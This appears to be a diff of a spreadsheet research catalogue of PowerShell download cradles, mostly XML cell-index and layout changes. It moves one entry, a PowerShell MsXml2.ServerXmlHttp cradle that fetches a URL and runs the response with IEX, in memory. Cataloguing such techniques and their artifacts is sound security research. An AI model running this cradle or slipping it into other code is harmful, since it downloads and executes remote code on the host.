-    <row r="6" spans="1:5" ht="64">
+        <v>54</v>
+      </c>
+      <c r="D5" s="7" t="s">
+        <v>54</v>
+      </c>
+    </row>
+    <row r="6" spans="1:6" ht="64">
       <c r="A6" s="13" t="s">
         <v>7</v>
       </c>
       <c r="B6" s="7" t="s">
-        <v>31</v>
+        <v>28</v>
       </c>
       <c r="C6" s="7" t="s">
-        <v>31</v>
-      </c>
-    </row>
-    <row r="7" spans="1:5" ht="409.6">
+        <v>28</v>
+      </c>
+      <c r="D6" s="7" t="s">
+        <v>28</v>
+      </c>
+    </row>
+    <row r="7" spans="1:6" ht="409.6">
       <c r="A7" s="13" t="s">
         <v>8</v>
       </c>
       <c r="B7" s="17" t="s">
-        <v>142</v>
-      </c>
-      <c r="C7" s="28" t="s">
-        <v>125</v>
-      </c>
-    </row>
-    <row r="8" spans="1:5" ht="160">
+        <v>179</v>
+      </c>
+      <c r="C7" s="17" t="s">
+        <v>128</v>
+      </c>
+      <c r="D7" s="27" t="s">
+        <v>118</v>
+      </c>
+    </row>
+    <row r="8" spans="1:6" ht="290">
       <c r="A8" s="13" t="s">
-        <v>84</v>
+        <v>77</v>
       </c>
       <c r="B8" s="17" t="s">
-        <v>24</v>
+        <v>187</v>
       </c>
       <c r="C8" s="17" t="s">
-        <v>57</v>
-      </c>
-    </row>
-    <row r="9" spans="1:5" ht="409.6">
+        <v>188</v>
+      </c>
+      <c r="D8" s="17" t="s">
+        <v>189</v>
+      </c>
+    </row>
+    <row r="9" spans="1:6" ht="409.6">
       <c r="A9" s="13" t="s">
-        <v>85</v>
+        <v>78</v>
       </c>
       <c r="B9" s="17" t="s">
-        <v>136</v>
+        <v>180</v>
       </c>
       <c r="C9" s="17" t="s">
-        <v>53</v>
+        <v>124</v>
+      </c>
+      <c r="D9" s="17" t="s">
+        <v>50</v>
       </c>
     </row>
   </sheetData>
@@ -9387,77 +12650,93 @@
 <file path=xl/worksheets/sheet6.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
   <sheetPr codeName="Sheet5"/>
-  <dimension ref="A1:C9"/>
+  <dimension ref="A1:D9"/>
   <sheetViews>
-    <sheetView showGridLines="0" topLeftCell="A7" workbookViewId="0">
+    <sheetView showGridLines="0" workbookViewId="0">
       <pane xSplit="1" topLeftCell="B1" activePane="topRight" state="frozen"/>
-      <selection pane="topRight" activeCell="B7" sqref="B7"/>
+      <selection pane="topRight" activeCell="B8" sqref="B8"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
   <cols>
-    <col min="1" max="1" width="25.5" style="20" customWidth="1"/>
-    <col min="2" max="2" width="121.5" style="9" customWidth="1"/>
-    <col min="3" max="3" width="186.33203125" style="9" customWidth="1"/>
-    <col min="4" max="16384" width="10.83203125" style="9"/>
+    <col min="1" max="1" width="25.5" style="19" customWidth="1"/>
+    <col min="2" max="2" width="133.1640625" style="9" customWidth="1"/>
+    <col min="3" max="3" width="121.5" style="9" customWidth="1"/>
+    <col min="4" max="4" width="186.33203125" style="9" customWidth="1"/>
+    <col min="5" max="16384" width="10.83203125" style="9"/>
   </cols>
   <sheetData>
-    <row r="1" spans="1:3">
+    <row r="1" spans="1:4">
       <c r="A1" s="12" t="s">
-        <v>20</v>
-      </c>
-      <c r="B1" s="18" t="s">
-        <v>121</v>
-      </c>
-      <c r="C1" s="26" t="s">
-        <v>48</v>
-      </c>
-    </row>
-    <row r="2" spans="1:3" ht="144">
+        <v>18</v>
+      </c>
+      <c r="B1" s="9" t="s">
+        <v>166</v>
+      </c>
+      <c r="C1" s="18" t="s">
+        <v>114</v>
+      </c>
+      <c r="D1" s="25" t="s">
+        <v>45</v>
+      </c>
+    </row>
+    <row r="2" spans="1:4" ht="144">
       <c r="A2" s="13" t="s">
         <v>5</v>
       </c>
-      <c r="B2" s="27" t="s">
-        <v>33</v>
-      </c>
-      <c r="C2" s="27" t="s">
-        <v>33</v>
-      </c>
-    </row>
-    <row r="3" spans="1:3" ht="64">
+      <c r="B2" s="26" t="s">
+        <v>30</v>
+      </c>
+      <c r="C2" s="26" t="s">
+        <v>30</v>
+      </c>
+      <c r="D2" s="26" t="s">
+        <v>30</v>
+      </c>
+    </row>
+    <row r="3" spans="1:4" ht="64">
       <c r="A3" s="14" t="s">
         <v>2</v>
       </c>
-      <c r="B3" s="27" t="s">
-        <v>138</v>
-      </c>
-      <c r="C3" s="45" t="s">
-        <v>104</v>
-      </c>
-    </row>
-    <row r="4" spans="1:3" ht="96">
+      <c r="B3" s="26" t="s">
+        <v>126</v>
+      </c>
+      <c r="C3" s="26" t="s">
+        <v>126</v>
+      </c>
+      <c r="D3" s="44" t="s">
+        <v>97</v>
+      </c>
+    </row>
+    <row r="4" spans="1:4" ht="128">
       <c r="A4" s="14" t="s">
-        <v>124</v>
+        <v>117</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>21</v>
+        <v>171</v>
       </c>
       <c r="C4" s="10" t="s">
-        <v>54</v>
-      </c>
-    </row>
-    <row r="5" spans="1:3">
+        <v>19</v>
+      </c>
+      <c r="D4" s="10" t="s">
+        <v>51</v>
+      </c>
+    </row>
+    <row r="5" spans="1:4">
       <c r="A5" s="13" t="s">
-        <v>91</v>
+        <v>84</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>93</v>
+        <v>86</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>93</v>
-      </c>
-    </row>
-    <row r="6" spans="1:3" ht="64">
+        <v>86</v>
+      </c>
+      <c r="D5" s="7" t="s">
+        <v>86</v>
+      </c>
+    </row>
+    <row r="6" spans="1:4" ht="64">
       <c r="A6" s="13" t="s">
         <v>7</v>
       </c>
@@ -9465,40 +12744,52 @@
         <v>11</v>
       </c>
       <c r="C6" s="17" t="s">
-        <v>56</v>
-      </c>
-    </row>
-    <row r="7" spans="1:3" ht="409.6">
+        <v>11</v>
+      </c>
+      <c r="D6" s="17" t="s">
+        <v>53</v>
+      </c>
+    </row>
+    <row r="7" spans="1:4" ht="409.6">
       <c r="A7" s="13" t="s">
         <v>8</v>
       </c>
-      <c r="B7" s="17" t="s">
-        <v>143</v>
-      </c>
-      <c r="C7" s="28" t="s">
-        <v>126</v>
-      </c>
-    </row>
-    <row r="8" spans="1:3" ht="318">
+      <c r="B7" s="54" t="s">
+        <v>181</v>
+      </c>
+      <c r="C7" s="17" t="s">
+        <v>186</v>
+      </c>
+      <c r="D7" s="27" t="s">
+        <v>119</v>
+      </c>
+    </row>
+    <row r="8" spans="1:4" ht="332">
       <c r="A8" s="13" t="s">
-        <v>84</v>
-      </c>
-      <c r="B8" s="17" t="s">
-        <v>152</v>
+        <v>77</v>
+      </c>
+      <c r="B8" s="54" t="s">
+        <v>193</v>
       </c>
       <c r="C8" s="17" t="s">
-        <v>127</v>
-      </c>
-    </row>
-    <row r="9" spans="1:3">
+        <v>133</v>
+      </c>
+      <c r="D8" s="17" t="s">
+        <v>192</v>
+      </c>
+    </row>
+    <row r="9" spans="1:4">
       <c r="A9" s="13" t="s">
-        <v>85</v>
-      </c>
-      <c r="B9" s="29" t="s">
-        <v>153</v>
-      </c>
-      <c r="C9" s="29" t="s">
-        <v>153</v>
+        <v>78</v>
+      </c>
+      <c r="B9" s="28" t="s">
+        <v>134</v>
+      </c>
+      <c r="C9" s="28" t="s">
+        <v>134</v>
+      </c>
+      <c r="D9" s="28" t="s">
+        <v>134</v>
       </c>
     </row>
   </sheetData>
@@ -9510,118 +12801,146 @@
 <file path=xl/worksheets/sheet7.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
   <sheetPr codeName="Sheet7"/>
-  <dimension ref="A1:C9"/>
+  <dimension ref="A1:D9"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A7" zoomScale="115" workbookViewId="0">
+    <sheetView topLeftCell="A2" zoomScale="115" workbookViewId="0">
       <pane xSplit="1" topLeftCell="B1" activePane="topRight" state="frozen"/>
-      <selection pane="topRight" activeCell="B8" sqref="B8"/>
+      <selection pane="topRight" activeCell="B4" sqref="B4"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
   <cols>
     <col min="1" max="1" width="25.5" style="11" customWidth="1"/>
-    <col min="2" max="2" width="121.5" style="9" customWidth="1"/>
-    <col min="3" max="3" width="146" style="9" customWidth="1"/>
-    <col min="4" max="16384" width="10.83203125" style="9"/>
+    <col min="2" max="2" width="133.1640625" style="9" customWidth="1"/>
+    <col min="3" max="3" width="121.5" style="9" customWidth="1"/>
+    <col min="4" max="4" width="146" style="9" customWidth="1"/>
+    <col min="5" max="16384" width="10.83203125" style="9"/>
   </cols>
   <sheetData>
-    <row r="1" spans="1:3" s="8" customFormat="1">
+    <row r="1" spans="1:4" s="8" customFormat="1">
       <c r="A1" s="12" t="s">
-        <v>20</v>
-      </c>
-      <c r="B1" s="18" t="s">
-        <v>121</v>
-      </c>
-      <c r="C1" s="26" t="s">
-        <v>48</v>
-      </c>
-    </row>
-    <row r="2" spans="1:3" ht="128">
+        <v>18</v>
+      </c>
+      <c r="B1" s="25" t="s">
+        <v>166</v>
+      </c>
+      <c r="C1" s="18" t="s">
+        <v>114</v>
+      </c>
+      <c r="D1" s="25" t="s">
+        <v>45</v>
+      </c>
+    </row>
+    <row r="2" spans="1:4" ht="128">
       <c r="A2" s="13" t="s">
         <v>5</v>
       </c>
-      <c r="B2" s="27" t="s">
-        <v>32</v>
-      </c>
-      <c r="C2" s="27" t="s">
-        <v>32</v>
-      </c>
-    </row>
-    <row r="3" spans="1:3" ht="32">
+      <c r="B2" s="26" t="s">
+        <v>29</v>
+      </c>
+      <c r="C2" s="26" t="s">
+        <v>29</v>
+      </c>
+      <c r="D2" s="26" t="s">
+        <v>29</v>
+      </c>
+    </row>
+    <row r="3" spans="1:4" ht="32">
       <c r="A3" s="14" t="s">
         <v>2</v>
       </c>
-      <c r="B3" s="27" t="s">
+      <c r="B3" s="26" t="s">
         <v>1</v>
       </c>
-      <c r="C3" s="28" t="s">
-        <v>105</v>
-      </c>
-    </row>
-    <row r="4" spans="1:3" ht="48">
+      <c r="C3" s="26" t="s">
+        <v>1</v>
+      </c>
+      <c r="D3" s="27" t="s">
+        <v>98</v>
+      </c>
+    </row>
+    <row r="4" spans="1:4" ht="48">
       <c r="A4" s="14" t="s">
-        <v>124</v>
-      </c>
-      <c r="B4" s="10" t="s">
-        <v>22</v>
-      </c>
-      <c r="C4" s="28" t="s">
-        <v>55</v>
-      </c>
-    </row>
-    <row r="5" spans="1:3">
+        <v>117</v>
+      </c>
+      <c r="B4" s="27" t="s">
+        <v>170</v>
+      </c>
+      <c r="C4" s="10" t="s">
+        <v>20</v>
+      </c>
+      <c r="D4" s="27" t="s">
+        <v>52</v>
+      </c>
+    </row>
+    <row r="5" spans="1:4">
       <c r="A5" s="13" t="s">
-        <v>91</v>
+        <v>84</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>94</v>
+        <v>87</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>94</v>
-      </c>
-    </row>
-    <row r="6" spans="1:3" ht="112">
+        <v>87</v>
+      </c>
+      <c r="D5" s="7" t="s">
+        <v>87</v>
+      </c>
+    </row>
+    <row r="6" spans="1:4" ht="112">
       <c r="A6" s="13" t="s">
         <v>7</v>
       </c>
       <c r="B6" s="17" t="s">
-        <v>10</v>
+        <v>176</v>
       </c>
       <c r="C6" s="17" t="s">
         <v>10</v>
       </c>
-    </row>
-    <row r="7" spans="1:3" ht="409.6">
+      <c r="D6" s="17" t="s">
+        <v>10</v>
+      </c>
+    </row>
+    <row r="7" spans="1:4" ht="407" customHeight="1">
       <c r="A7" s="13" t="s">
         <v>8</v>
       </c>
-      <c r="B7" s="52" t="s">
-        <v>144</v>
-      </c>
-      <c r="C7" s="28" t="s">
-        <v>128</v>
-      </c>
-    </row>
-    <row r="8" spans="1:3" ht="232">
+      <c r="B7" s="27" t="s">
+        <v>172</v>
+      </c>
+      <c r="C7" s="50" t="s">
+        <v>190</v>
+      </c>
+      <c r="D7" s="27" t="s">
+        <v>120</v>
+      </c>
+    </row>
+    <row r="8" spans="1:4" ht="246">
       <c r="A8" s="13" t="s">
-        <v>84</v>
-      </c>
-      <c r="B8" s="31" t="s">
-        <v>145</v>
-      </c>
-      <c r="C8" s="31" t="s">
-        <v>59</v>
-      </c>
-    </row>
-    <row r="9" spans="1:3">
+        <v>77</v>
+      </c>
+      <c r="B8" s="30" t="s">
+        <v>177</v>
+      </c>
+      <c r="C8" s="30" t="s">
+        <v>129</v>
+      </c>
+      <c r="D8" s="30" t="s">
+        <v>191</v>
+      </c>
+    </row>
+    <row r="9" spans="1:4">
       <c r="A9" s="13" t="s">
-        <v>85</v>
-      </c>
-      <c r="B9" s="29" t="s">
-        <v>14</v>
-      </c>
-      <c r="C9" s="29" t="s">
-        <v>14</v>
+        <v>78</v>
+      </c>
+      <c r="B9" s="28" t="s">
+        <v>178</v>
+      </c>
+      <c r="C9" s="28" t="s">
+        <v>13</v>
+      </c>
+      <c r="D9" s="28" t="s">
+        <v>13</v>
       </c>
     </row>
   </sheetData>
@@ -9633,77 +12952,93 @@
 <file path=xl/worksheets/sheet8.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
   <sheetPr codeName="Sheet8"/>
-  <dimension ref="A1:C9"/>
+  <dimension ref="A1:D9"/>
   <sheetViews>
     <sheetView workbookViewId="0">
       <pane xSplit="1" topLeftCell="B1" activePane="topRight" state="frozen"/>
-      <selection pane="topRight" activeCell="B8" sqref="B8"/>
+      <selection pane="topRight" activeCell="C3" sqref="C3"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
   <cols>
-    <col min="1" max="1" width="25.5" style="20" customWidth="1"/>
-    <col min="2" max="2" width="121.5" style="21" customWidth="1"/>
-    <col min="3" max="3" width="117.33203125" style="9" customWidth="1"/>
-    <col min="4" max="16384" width="10.83203125" style="9"/>
+    <col min="1" max="1" width="25.5" style="19" customWidth="1"/>
+    <col min="2" max="2" width="133.1640625" style="9" customWidth="1"/>
+    <col min="3" max="3" width="121.5" style="20" customWidth="1"/>
+    <col min="4" max="4" width="117.33203125" style="9" customWidth="1"/>
+    <col min="5" max="16384" width="10.83203125" style="9"/>
   </cols>
   <sheetData>
-    <row r="1" spans="1:3" s="8" customFormat="1">
+    <row r="1" spans="1:4" s="8" customFormat="1">
       <c r="A1" s="12" t="s">
-        <v>20</v>
-      </c>
-      <c r="B1" s="18" t="s">
-        <v>121</v>
-      </c>
-      <c r="C1" s="26" t="s">
-        <v>48</v>
-      </c>
-    </row>
-    <row r="2" spans="1:3" ht="112">
+        <v>18</v>
+      </c>
+      <c r="B1" s="9" t="s">
+        <v>166</v>
+      </c>
+      <c r="C1" s="18" t="s">
+        <v>114</v>
+      </c>
+      <c r="D1" s="25" t="s">
+        <v>45</v>
+      </c>
+    </row>
+    <row r="2" spans="1:4" ht="112">
       <c r="A2" s="13" t="s">
         <v>5</v>
       </c>
       <c r="B2" s="10" t="s">
-        <v>37</v>
+        <v>34</v>
       </c>
       <c r="C2" s="10" t="s">
-        <v>37</v>
-      </c>
-    </row>
-    <row r="3" spans="1:3" ht="32">
+        <v>34</v>
+      </c>
+      <c r="D2" s="10" t="s">
+        <v>34</v>
+      </c>
+    </row>
+    <row r="3" spans="1:4" ht="32">
       <c r="A3" s="14" t="s">
         <v>2</v>
       </c>
       <c r="B3" s="10" t="s">
         <v>3</v>
       </c>
-      <c r="C3" s="46" t="s">
-        <v>106</v>
-      </c>
-    </row>
-    <row r="4" spans="1:3" ht="34" customHeight="1">
+      <c r="C3" s="10" t="s">
+        <v>3</v>
+      </c>
+      <c r="D3" s="45" t="s">
+        <v>99</v>
+      </c>
+    </row>
+    <row r="4" spans="1:4" ht="48">
       <c r="A4" s="14" t="s">
-        <v>124</v>
+        <v>117</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>21</v>
-      </c>
-      <c r="C4" s="28" t="s">
-        <v>60</v>
-      </c>
-    </row>
-    <row r="5" spans="1:3">
+        <v>194</v>
+      </c>
+      <c r="C4" s="10" t="s">
+        <v>19</v>
+      </c>
+      <c r="D4" s="27" t="s">
+        <v>55</v>
+      </c>
+    </row>
+    <row r="5" spans="1:4">
       <c r="A5" s="13" t="s">
-        <v>91</v>
+        <v>84</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>92</v>
+        <v>85</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>92</v>
-      </c>
-    </row>
-    <row r="6" spans="1:3">
+        <v>85</v>
+      </c>
+      <c r="D5" s="7" t="s">
+        <v>85</v>
+      </c>
+    </row>
+    <row r="6" spans="1:4">
       <c r="A6" s="13" t="s">
         <v>7</v>
       </c>
@@ -9713,38 +13048,50 @@
       <c r="C6" s="7" t="s">
         <v>12</v>
       </c>
-    </row>
-    <row r="7" spans="1:3" ht="296">
+      <c r="D6" s="7" t="s">
+        <v>12</v>
+      </c>
+    </row>
+    <row r="7" spans="1:4" ht="409.6">
       <c r="A7" s="13" t="s">
         <v>8</v>
       </c>
       <c r="B7" s="7" t="s">
-        <v>150</v>
-      </c>
-      <c r="C7" s="55" t="s">
-        <v>129</v>
-      </c>
-    </row>
-    <row r="8" spans="1:3" ht="32">
+        <v>195</v>
+      </c>
+      <c r="C7" s="7" t="s">
+        <v>196</v>
+      </c>
+      <c r="D7" s="55" t="s">
+        <v>197</v>
+      </c>
+    </row>
+    <row r="8" spans="1:4" ht="32">
       <c r="A8" s="13" t="s">
-        <v>84</v>
+        <v>77</v>
       </c>
       <c r="B8" s="7" t="s">
-        <v>148</v>
+        <v>131</v>
       </c>
       <c r="C8" s="7" t="s">
-        <v>148</v>
-      </c>
-    </row>
-    <row r="9" spans="1:3" ht="48">
+        <v>131</v>
+      </c>
+      <c r="D8" s="7" t="s">
+        <v>131</v>
+      </c>
+    </row>
+    <row r="9" spans="1:4" ht="48">
       <c r="A9" s="13" t="s">
-        <v>85</v>
+        <v>78</v>
       </c>
       <c r="B9" s="7" t="s">
-        <v>149</v>
+        <v>132</v>
       </c>
       <c r="C9" s="7" t="s">
-        <v>149</v>
+        <v>132</v>
+      </c>
+      <c r="D9" s="7" t="s">
+        <v>132</v>
       </c>
     </row>
   </sheetData>
@@ -9756,77 +13103,93 @@
 <file path=xl/worksheets/sheet9.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
   <sheetPr codeName="Sheet10"/>
-  <dimension ref="A1:C9"/>
+  <dimension ref="A1:D9"/>
   <sheetViews>
     <sheetView workbookViewId="0">
       <pane xSplit="1" topLeftCell="B1" activePane="topRight" state="frozen"/>
-      <selection pane="topRight" activeCell="B9" sqref="B9"/>
+      <selection pane="topRight" activeCell="B7" sqref="B7"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
   <cols>
     <col min="1" max="1" width="25.5" style="11" customWidth="1"/>
-    <col min="2" max="2" width="121.5" style="22" customWidth="1"/>
-    <col min="3" max="3" width="120.33203125" style="9" customWidth="1"/>
-    <col min="4" max="16384" width="10.83203125" style="9"/>
+    <col min="2" max="2" width="133.1640625" style="9" customWidth="1"/>
+    <col min="3" max="3" width="121.5" style="21" customWidth="1"/>
+    <col min="4" max="4" width="120.33203125" style="9" customWidth="1"/>
+    <col min="5" max="16384" width="10.83203125" style="9"/>
   </cols>
   <sheetData>
-    <row r="1" spans="1:3" s="8" customFormat="1">
+    <row r="1" spans="1:4" s="8" customFormat="1">
       <c r="A1" s="12" t="s">
-        <v>20</v>
-      </c>
-      <c r="B1" s="18" t="s">
-        <v>121</v>
-      </c>
-      <c r="C1" s="26" t="s">
-        <v>48</v>
-      </c>
-    </row>
-    <row r="2" spans="1:3" ht="112">
+        <v>18</v>
+      </c>
+      <c r="B1" s="9" t="s">
+        <v>166</v>
+      </c>
+      <c r="C1" s="18" t="s">
+        <v>114</v>
+      </c>
+      <c r="D1" s="25" t="s">
+        <v>45</v>
+      </c>
+    </row>
+    <row r="2" spans="1:4" ht="112">
       <c r="A2" s="13" t="s">
         <v>5</v>
       </c>
       <c r="B2" s="10" t="s">
-        <v>36</v>
+        <v>33</v>
       </c>
       <c r="C2" s="10" t="s">
-        <v>36</v>
-      </c>
-    </row>
-    <row r="3" spans="1:3" ht="17" customHeight="1">
+        <v>33</v>
+      </c>
+      <c r="D2" s="10" t="s">
+        <v>33</v>
+      </c>
+    </row>
+    <row r="3" spans="1:4" ht="17" customHeight="1">
       <c r="A3" s="14" t="s">
         <v>2</v>
       </c>
       <c r="B3" s="10" t="s">
         <v>4</v>
       </c>
-      <c r="C3" s="46" t="s">
-        <v>106</v>
-      </c>
-    </row>
-    <row r="4" spans="1:3" ht="32" customHeight="1">
+      <c r="C3" s="10" t="s">
+        <v>4</v>
+      </c>
+      <c r="D3" s="45" t="s">
+        <v>99</v>
+      </c>
+    </row>
+    <row r="4" spans="1:4" ht="32" customHeight="1">
       <c r="A4" s="14" t="s">
-        <v>124</v>
+        <v>117</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>21</v>
-      </c>
-      <c r="C4" s="28" t="s">
-        <v>60</v>
-      </c>
-    </row>
-    <row r="5" spans="1:3">
+        <v>194</v>
+      </c>
+      <c r="C4" s="10" t="s">
+        <v>19</v>
+      </c>
+      <c r="D4" s="27" t="s">
+        <v>55</v>
+      </c>
+    </row>
+    <row r="5" spans="1:4">
       <c r="A5" s="13" t="s">
-        <v>91</v>
+        <v>84</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>92</v>
+        <v>85</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>92</v>
-      </c>
-    </row>
-    <row r="6" spans="1:3">
+        <v>85</v>
+      </c>
+      <c r="D5" s="7" t="s">
+        <v>85</v>
+      </c>
+    </row>
+    <row r="6" spans="1:4">
       <c r="A6" s="13" t="s">
         <v>7</v>
       </c>
@@ -9836,38 +13199,50 @@
       <c r="C6" s="7" t="s">
         <v>12</v>
       </c>
-    </row>
-    <row r="7" spans="1:3" ht="320">
+      <c r="D6" s="7" t="s">
+        <v>12</v>
+      </c>
+    </row>
+    <row r="7" spans="1:4" ht="296" customHeight="1">
       <c r="A7" s="13" t="s">
         <v>8</v>
       </c>
-      <c r="B7" s="7" t="s">
-        <v>151</v>
-      </c>
-      <c r="C7" s="45" t="s">
-        <v>61</v>
-      </c>
-    </row>
-    <row r="8" spans="1:3" ht="32">
+      <c r="B7" s="54" t="s">
+        <v>204</v>
+      </c>
+      <c r="C7" s="7" t="s">
+        <v>202</v>
+      </c>
+      <c r="D7" s="35" t="s">
+        <v>203</v>
+      </c>
+    </row>
+    <row r="8" spans="1:4" ht="32">
       <c r="A8" s="13" t="s">
-        <v>84</v>
+        <v>77</v>
       </c>
       <c r="B8" s="7" t="s">
-        <v>148</v>
+        <v>131</v>
       </c>
       <c r="C8" s="7" t="s">
-        <v>148</v>
-      </c>
-    </row>
-    <row r="9" spans="1:3" ht="64">
+        <v>131</v>
+      </c>
+      <c r="D8" s="7" t="s">
+        <v>131</v>
+      </c>
+    </row>
+    <row r="9" spans="1:4" ht="64">
       <c r="A9" s="13" t="s">
-        <v>85</v>
+        <v>78</v>
       </c>
       <c r="B9" s="7" t="s">
-        <v>64</v>
+        <v>58</v>
       </c>
       <c r="C9" s="7" t="s">
-        <v>64</v>
+        <v>58</v>
+      </c>
+      <c r="D9" s="7" t="s">
+        <v>58</v>
       </c>
     </row>
   </sheetData>

--- a/other/DownloadCradle/DownloadCradle.xlsx
+++ b/other/DownloadCradle/DownloadCradle.xlsx
@@ -9,7 +9,7 @@
     </mc:Choice>
   </mc:AlternateContent>
   <bookViews>
-    <workbookView xWindow="760" yWindow="460" windowWidth="28040" windowHeight="17540" firstSheet="6" activeTab="18"/>
+    <workbookView xWindow="760" yWindow="460" windowWidth="28040" windowHeight="17540" activeTab="1"/>
   </bookViews>
   <sheets>
     <sheet name="Methodology" sheetId="4" r:id="rId1"/>
@@ -417,47 +417,6 @@
 Powershell version: 2+
 Proxy: not proxy aware
 PsComWinHttp: memory only</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">PowerShell </t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>MsXml COM</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve"> Object interactions</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET',$Url,$False);$comMsXml.Send();IEX $comMsXml.ResponseText 
-Powershell version: 2+
-Proxy: proxy aware
-PSComMsxml: memory only</t>
     </r>
   </si>
   <si>
@@ -9320,6 +9279,46 @@
 Windows ® Script Component Runtime - C:\Windows\System32\scrobj.dll
 Winsock2 Helper DLL (TL/IPv4) - C:\Windows\System32\WSHTCPIP.DLL
 Winsock2 Helper DLL (TL/IPv6) - C:\Windows\System32\wship6.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">PowerShell </t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>MsXml COM</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve"> Object interactions</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET',$Url,$False);$comMsXml.Send();IEX $comMsXml.ResponseText 
+Powershell version: 2+
+PSComMsxml: memory only</t>
     </r>
   </si>
 </sst>
@@ -10471,22 +10470,22 @@
   <sheetData>
     <row r="1" spans="1:1" ht="152">
       <c r="A1" s="3" t="s">
-        <v>75</v>
+        <v>74</v>
       </c>
     </row>
     <row r="2" spans="1:1" ht="104">
       <c r="A2" s="4" t="s">
-        <v>221</v>
+        <v>220</v>
       </c>
     </row>
     <row r="3" spans="1:1" ht="200">
       <c r="A3" s="3" t="s">
-        <v>156</v>
+        <v>155</v>
       </c>
     </row>
     <row r="4" spans="1:1" ht="120">
       <c r="A4" s="3" t="s">
-        <v>157</v>
+        <v>156</v>
       </c>
     </row>
     <row r="5" spans="1:1" ht="24">
@@ -10521,7 +10520,7 @@
   <sheetPr codeName="Sheet11"/>
   <dimension ref="A1:J9"/>
   <sheetViews>
-    <sheetView topLeftCell="A2" workbookViewId="0">
+    <sheetView workbookViewId="0">
       <pane xSplit="1" topLeftCell="B1" activePane="topRight" state="frozen"/>
       <selection pane="topRight" activeCell="B7" sqref="B7"/>
     </sheetView>
@@ -10540,13 +10539,13 @@
         <v>18</v>
       </c>
       <c r="B1" s="25" t="s">
-        <v>150</v>
+        <v>149</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>110</v>
+        <v>109</v>
       </c>
       <c r="D1" s="25" t="s">
-        <v>45</v>
+        <v>44</v>
       </c>
     </row>
     <row r="2" spans="1:10" ht="112">
@@ -10581,30 +10580,30 @@
     </row>
     <row r="4" spans="1:10" ht="52" customHeight="1">
       <c r="A4" s="14" t="s">
-        <v>113</v>
+        <v>112</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>153</v>
+        <v>152</v>
       </c>
       <c r="C4" s="10" t="s">
         <v>19</v>
       </c>
       <c r="D4" s="27" t="s">
-        <v>55</v>
+        <v>54</v>
       </c>
     </row>
     <row r="5" spans="1:10">
       <c r="A5" s="13" t="s">
+        <v>79</v>
+      </c>
+      <c r="B5" s="7" t="s">
